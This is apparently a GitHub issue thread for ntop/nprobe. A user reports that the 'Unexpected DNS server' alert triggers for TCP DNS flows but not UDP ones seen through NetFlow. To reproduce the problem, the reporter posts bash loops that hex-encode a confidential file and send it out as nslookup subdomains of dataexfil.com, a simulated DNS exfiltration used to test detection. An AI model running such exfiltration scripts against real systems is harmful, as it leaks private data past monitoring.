
Unexpected DNS server alert #591

Open
Cyberfrenk opened this issue Dec 17, 2023 · 3 comments
Comments

@Cyberfrenk

Hello Team,
I'm trying to trigger the "Unexpected DNS server" alert in my environment, but it works only when the DNS requests are TCP based; when the DNS requests are UDP based, the protocol is not recognised and the destination port is marked as "unknown".
Here is my environment: "netflow-server1" is the ntop/nprobe server, and the virtual Cisco router in the middle is sending NetFlow records to it:

[image: networkTopology]

Here is the result of the DNS UDP flow:
[image: ntopFlowUDP]

Here is the result of the DNS TCP flow:
[image: ntopFlowTCP]

I'm attaching here the pcap (dnsRequestsUDP.pcapng) with the UDP based DNS requests (no alert triggered), the pcap (dnsRequestsTCP.pcapng) with the TCP based DNS requests (alert triggered), and the NetFlow captures that go from the Cisco router to the NetFlow server for UDP and TCP (netflowUDP.pcapng and netflowTCP.pcapng).
Kindly help me to understand what is missing in the NetFlow record that "summarizes" the DNS requests; the IP protocol 17 (UDP) and the destination port 53 are present.

*A sample CFLOW packet that contains the UDP based DNS request is number 7 (netflowUDP.pcapng)
**A sample CFLOW packet that contains the TCP based DNS request is number 73 (netflowTCP.pcapng)

[image: netflowRecordUDP]
[image: netflowRecordTCP]

Grazie
Davide

@Cyberfrenk
Author

Hi Team,
Here are the steps to simulate my scenario:

  • Create a "confidentialFile.txt" file that is long enough
  • Convert its content to hex data with the command below (the xxd package is needed)
    xxd -p -c48 confidentialFile.txt > hex.txt
  • Launch the scripts below: the 1st sends data through UDP (no alarm triggered), the 2nd through TCP (alarm triggered)
    With this test I'm trying to trigger the "Unexpected DNS server" alert only
#!/bin/bash
# UDP variant: one line of hex.txt per query, sent to the internal resolver 10.0.20.10
for (( i=1 ; i<=236 ; i+=1 )) ; do
  line=$(sed -n "${i}p" hex.txt)
  echo "$line"
  echo nslookup "$line.dataexfil.com" 10.0.20.10
  nslookup "$line.dataexfil.com" 10.0.20.10
done

#!/bin/bash
# TCP variant: identical, but -vc forces nslookup to use a TCP virtual circuit
for (( i=1 ; i<=236 ; i+=1 )) ; do
  line=$(sed -n "${i}p" hex.txt)
  echo "$line"
  echo nslookup -vc "$line.dataexfil.com" 10.0.20.10
  nslookup -vc "$line.dataexfil.com" 10.0.20.10
done

Here is the NTOP configuration:
[image: unexpectedDnsServerConfig]

Since we're asking the server 10.0.20.10 for resolution instead of 1.1.1.1 or 8.8.8.8, we'd expect to get the mentioned alert.

*The above scenario has the purpose of simulating a DNS data exfiltration; I've tried to simulate it with the ntop/nprobe server inline and it detects the "Unexpected DNS server" and also the "Suspicious DNS traffic" alerts.

Thanks in advance
Davide
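For reference, the check the reporter expects, expressed against the NetFlow fields the flow records carry. This is an added illustration, not ntopng or nprobe code: it assumes NetFlow v5 record layout (the issue does not say which export version the router uses), an allow list of 1.1.1.1 and 8.8.8.8, and constructed sample records; the point is that protocol 17 and destination port 53 are both in the record, so the alert should key on UDP as well as TCP.

```python
import struct
from ipaddress import ip_address

# NetFlow v5 flow record: 48 bytes, network byte order. v5 is assumed here
# because the issue does not say which export version the Cisco router uses.
V5_RECORD = struct.Struct("!4s4s4sHHIIIIHHBBBBHHBBH")

# Assumed allow list, mirroring the 1.1.1.1 / 8.8.8.8 resolvers named in the issue.
EXPECTED_DNS_SERVERS = {ip_address("1.1.1.1"), ip_address("8.8.8.8")}

def parse_v5_record(buf: bytes) -> dict:
    """Pull the fields the alert needs out of one exported flow record."""
    f = V5_RECORD.unpack(buf)
    return {"src": ip_address(f[0]), "dst": ip_address(f[1]),
            "src_port": f[9], "dst_port": f[10], "proto": f[13]}

def is_dns_flow(rec: dict) -> bool:
    # DNS runs over UDP (17) and TCP (6); keying only on TCP reproduces the
    # behaviour reported in the issue, so both protocol numbers are accepted.
    return rec["dst_port"] == 53 and rec["proto"] in (6, 17)

def unexpected_dns_server(rec: dict) -> bool:
    return is_dns_flow(rec) and rec["dst"] not in EXPECTED_DNS_SERVERS

def make_record(src: str, dst: str, proto: int, dst_port: int) -> bytes:
    # Constructed test record: next hop, counters, timestamps and AS fields are zero/dummy.
    return V5_RECORD.pack(ip_address(src).packed, ip_address(dst).packed, b"\0" * 4,
                          0, 0, 1, 80, 0, 0, 40000, dst_port, 0, 0, proto, 0, 0, 0, 0, 0, 0)

# Constructed export payload: what the router would summarise for the two scripts.
SAMPLE_EXPORT = b"".join([
    make_record("10.0.10.5", "10.0.20.10", 17, 53),   # UDP query, as in plain nslookup
    make_record("10.0.10.5", "10.0.20.10", 6, 53),    # TCP query, as in nslookup -vc
    make_record("10.0.10.5", "8.8.8.8", 17, 53),      # UDP query to an expected resolver
    make_record("10.0.10.5", "10.0.20.10", 6, 443),   # not DNS at all
])

def flag_export(payload: bytes) -> list:
    """Return the parsed records that should raise the alert."""
    records = (parse_v5_record(payload[i:i + V5_RECORD.size])
               for i in range(0, len(payload), V5_RECORD.size))
    return [r for r in records if unexpected_dns_server(r)]

if __name__ == "__main__":
    for r in flag_export(SAMPLE_EXPORT):
        proto = "UDP" if r["proto"] == 17 else "TCP"
        print(f"alert: unexpected DNS server {r['dst']} over {proto} from {r['src']}")
```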

@NicoMaio

Hi @Cyberfrenk,

Could you please send me the dnsRequestsUDP.pcapng and the dnsRequestsTCP.pcapng files to maio@ntop.org?

@Cyberfrenk
Author

Cyberfrenk commented Jan 30, 2024

Hi @NicoMaio,
pcapng files sent!

Thank you
